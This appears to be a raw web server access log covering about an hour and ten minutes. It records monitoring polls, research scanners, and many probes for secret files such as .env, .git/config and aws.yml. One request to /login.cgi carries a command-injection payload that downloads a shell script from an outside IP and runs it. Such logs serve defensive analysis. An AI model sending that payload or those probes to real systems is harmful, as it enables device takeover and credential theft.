3.8.140.82 - - [04/Jan/2024:22:17:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:17:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:18:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:18:40 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:18:46 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:18:51 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:18:54 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:22:19:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:19:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:20:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:20:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:20:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:20:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:21:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:21:16 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
51.75.35.29 - - [04/Jan/2024:22:21:22 +0100] "GET /staging/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:21:22 +0100] "GET /prod/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:21:22 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.8.140.82 - - [04/Jan/2024:22:21:24 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:21:33 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:21:36 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:22:22:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:22:22:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
3.8.140.82 - - [04/Jan/2024:22:22:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:23:02 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:23:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:23:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:23:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.75 - - [04/Jan/2024:22:23:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.75 - - [04/Jan/2024:22:23:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
51.159.103.17 - - [04/Jan/2024:22:24:05 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
212.91.246.72 - - [04/Jan/2024:22:24:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.159.103.17 - - [04/Jan/2024:22:24:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
51.159.103.17 - - [04/Jan/2024:22:24:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
3.8.140.82 - - [04/Jan/2024:22:24:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:24:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:24:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:24:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
54.173.133.244 - - [04/Jan/2024:22:24:50 +0100] "GET /config/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
54.173.133.244 - - [04/Jan/2024:22:25:04 +0100] "GET /src/main/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4"
212.91.246.72 - - [04/Jan/2024:22:25:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.221 - - [04/Jan/2024:22:25:46 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [04/Jan/2024:22:25:47 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:26:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:22:26:11 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:26:11 +0100] "GET /system/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:26:11 +0100] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:27:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:28:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.145.61.20 - - [04/Jan/2024:22:28:28 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jan/2024:22:29:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:30:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:22:30:51 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:30:51 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:30:51 +0100] "GET /server/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:31:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:32:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:33:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:34:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:22:34:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:35:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:22:35:19 +0100] "GET /config/aws.yml HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:35:19 +0100] "GET /application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:35:19 +0100] "GET /aws.yml HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:36:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:37:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:38:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:39:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.134.22.149 - - [04/Jan/2024:22:39:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 infrawatch/0.1"
185.134.22.149 - - [04/Jan/2024:22:39:52 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 infrawatch/0.1"
185.134.22.149 - - [04/Jan/2024:22:39:53 +0100] "GET /Ep1v HTTP/1.1" 404 309 "-" "Mozilla/5.0 infrawatch/0.1"
51.75.35.29 - - [04/Jan/2024:22:39:53 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:39:53 +0100] "GET /app/config/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:39:53 +0100] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.134.22.149 - - [04/Jan/2024:22:39:53 +0100] "GET /GWqN HTTP/1.1" 404 309 "-" "Mozilla/5.0 infrawatch/0.1"
212.91.246.72 - - [04/Jan/2024:22:40:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.175.182.99 - - [04/Jan/2024:22:40:18 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
31.220.0.86 - - [04/Jan/2024:22:40:21 +0100] "GET /.git/config HTTP/1.1" 404 329 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35"
212.91.246.72 - - [04/Jan/2024:22:41:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:22:41:48 +0100] "GET /backup/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:42:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:43:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.38 - - [04/Jan/2024:22:43:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [04/Jan/2024:22:44:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.173.133.244 - - [04/Jan/2024:22:44:52 +0100] "GET /node_modules/.git/config HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36"
3.85.24.248 - - [04/Jan/2024:22:44:52 +0100] "GET /node_modules/.git/config HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
54.173.133.244 - - [04/Jan/2024:22:44:59 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)"
212.91.246.72 - - [04/Jan/2024:22:45:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:46:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:47:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.173.173.98 - - [04/Jan/2024:22:47:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:48:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:49:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:50:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:51:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:52:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:53:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:54:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.41.159.251 - - [04/Jan/2024:22:55:04 +0100] "GET /test/.hg/hgrc HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.59"
212.91.246.72 - - [04/Jan/2024:22:55:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:56:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:57:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:58:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:22:59:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:00:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:01:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:02:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.85.24.248 - - [04/Jan/2024:23:02:30 +0100] "GET /src/main/.git/config HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3"
175.41.159.251 - - [04/Jan/2024:23:02:55 +0100] "GET /themes/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2"
212.91.246.72 - - [04/Jan/2024:23:03:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.41.159.251 - - [04/Jan/2024:23:03:44 +0100] "GET /info/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; YandexNews/4.0; +http://yandex.com/bots)"
212.91.246.72 - - [04/Jan/2024:23:04:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.173.133.244 - - [04/Jan/2024:23:04:58 +0100] "GET /components/.git/config HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6"
212.91.246.72 - - [04/Jan/2024:23:05:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:06:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:23:06:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:07:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.41.159.251 - - [04/Jan/2024:23:07:37 +0100] "GET /admin/.hg/hgrc HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9"
212.91.246.72 - - [04/Jan/2024:23:08:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.173.133.244 - - [04/Jan/2024:23:08:23 +0100] "GET /bin/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:09:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.229.95.148 - - [04/Jan/2024:23:10:10 +0100] "GET /plugins/.hg/hgrc HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 8.1.0; LM-X210CMR) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:10:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:11:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.175.182.99 - - [04/Jan/2024:23:11:44 +0100] "GET /admin/.git/config HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)"
212.91.246.72 - - [04/Jan/2024:23:12:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:13:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:14:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:15:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:16:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:17:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:23:17:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:18:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.41.159.251 - - [04/Jan/2024:23:18:31 +0100] "GET /images/.git/config HTTP/1.1" 404 323 "-" "ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19)"
212.91.246.72 - - [04/Jan/2024:23:19:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:23:19:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.154.225.80 - - [04/Jan/2024:23:19:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.154.225.80 - - [04/Jan/2024:23:19:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
165.154.225.80 - - [04/Jan/2024:23:20:10 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
212.91.246.72 - - [04/Jan/2024:23:20:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:21:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:22:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:23:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:23:23:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:23:24:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:25:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:25:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:25:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
175.41.159.251 - - [04/Jan/2024:23:25:50 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0"
3.8.140.82 - - [04/Jan/2024:23:25:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:23:26:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:23:27:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:23:27:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:23:27:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.94.145.57 - - [04/Jan/2024:23:27:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.57 - - [04/Jan/2024:23:27:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
